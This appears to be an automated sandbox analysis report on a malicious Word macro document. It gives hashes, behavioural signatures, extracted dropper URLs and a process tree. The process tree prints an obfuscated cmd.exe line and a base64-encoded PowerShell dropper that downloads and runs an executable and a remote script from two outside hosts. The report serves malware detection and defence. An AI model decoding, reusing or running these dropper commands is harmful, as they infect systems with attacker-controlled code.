Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 04:21

General

  • Target

    5d287802c4aa94113e94ef0e7a0c8803_JaffaCakes118.doc

  • Size

    178KB

  • MD5

    5d287802c4aa94113e94ef0e7a0c8803

  • SHA1

    31a8f4160a82520e1f57899403186603a91a011c

  • SHA256

    16380e6168e31a0098a70f629c0d5a1ade9f3230b322ec4a358fd85cf6bffd56

  • SHA512

    86f7e767de546c19fd4fd50092b5c80819b9c38c3bc83d5bebf8942372709810998f1e5c1ad4cd0d917687c8d849d099834ffd718b231a41c693eb0c2d996108

  • SSDEEP

    1536:G9otKt1KfMVQcklE0zlHHD93ydN94KESgOOVr6PAGI+vu6gTtA61vU9L9vS:rajx2Zl6PAGVu6gTtFC9v

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.48.88.236/stats.php

exe.dropper

http://owieoqkxkals.com/VRE/kotner.php?l=miox2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d287802c4aa94113e94ef0e7a0c8803_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^c^A^a^Q^B^l^A^G^8^A^c^Q^B^r^A^H^g^A^a^w^B^h^A^G^w^A^c^w^A^u^A^G^M^A^b^w^B^t^A^C^8^A^V^g^B^S^A^E^U^A^L^w^B^r^A^G^8^A^d^A^B^u^A^G^U^A^c^g^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^0^A^a^Q^B^v^A^H^g^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^Q^A^N^w^A^2^A^D^k^A^M^Q^A^x^A^D^k^A^M^g^A^2^A^D^E^A^N^A^A^4^A^D^c^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^N^A^A^3^A^D^Y^A^O^Q^A^x^A^D^E^A^O^Q^A^y^A^D^Y^A^M^Q^A^0^A^D^g^A^N^w^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^J^A^E^U^A^W^A^A^o^A^C^g^A^T^g^B^l^A^H^c^A^L^Q^B^P^A^G^I^A^a^g^B^l^A^G^M^A^d^A^A^g^A^F^M^A^e^Q^B^z^A^H^Q^A^Z^Q^B^t^A^C^4^A^T^g^B^l^A^H^Q^A^L^g^B^X^A^G^U^A^Y^g^B^D^A^G^w^A^a^Q^B^l^A^G^4^A^d^A^A^p^A^C^4^A^R^A^B^v^A^H^c^A^b^g^B^s^A^G^8^A^Y^Q^B^k^A^F^M^A^d^A^B^y^A^G^k^A^b^g^B^n^A^C^g^A^I^g^B^o^A^H^Q^A^d^A^B^w^A^D^o^A^L^w^A^v^A^D^E^A^O^Q^A^y^A^C^4^A^N^A^A^4^A^C^4^A^O^A^A^4^A^C^4^A^M^g^A^z^A^D^Y^A^L^w^B^z^A^H^Q^A^Y^Q^B^0^A^H^M^A^L^g^B^w^A^G^g^A^c^A^A^i^A^C^k^A^K^Q^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^7^A^C^A^A
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOweRsHeLL.exe -EC KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBvAHcAaQBlAG8AcQBrAHgAawBhAGwAcwAuAGMAbwBtAC8AVgBSAEUALwBrAG8AdABuAGUAcgAuAHAAaABwAD8AbAA9AG0AaQBvAHgAMgAuAHAAYQBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAxADQANwA2ADkAMQAxADkAMgA2ADEANAA4ADcAMQAuAGUAeABlAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADEANAA3ADYAOQAxADEAOQAyADYAMQA0ADgANwAxAC4AZQB4AGUALgBlAHgAZQAnADsAIABJAEUAWAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4ANAA4AC4AOAA4AC4AMgAzADYALwBzAHQAYQB0AHMALgBwAGgAcAAiACkAKQA7ACAARQB4AGkAdAA7ACAA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2540
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2452

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      62339dedbce1726c48201ad9ab8358f6

      SHA1

      f3dbca8ca82025644400c1725cbd5f42ccb6a816

      SHA256

      0f760fa40169367d529ec173e35ed6185d333afa3ce9a2edf9c739cf30e59168

      SHA512

      17857a49d8cf25234cb462e8cae6d14b2375a709c5ed6691785cc4cfe59df6a2a1e0ab67538d4ab0d3953ea683740a61b4b6baad60baf2513bbc420a3d4bab13

    • memory/2808-8-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-7-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-5-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-6-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-10-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-13-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-2-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB

    • memory/2808-0-0x000000002F2B1000-0x000000002F2B2000-memory.dmp

      Filesize

      4KB

    • memory/2808-9-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-11-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-21-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB

    • memory/2808-22-0x00000000002D0000-0x00000000003D0000-memory.dmp

      Filesize

      1024KB

    • memory/2808-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2808-37-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2808-38-0x0000000070E5D000-0x0000000070E68000-memory.dmp

      Filesize

      44KB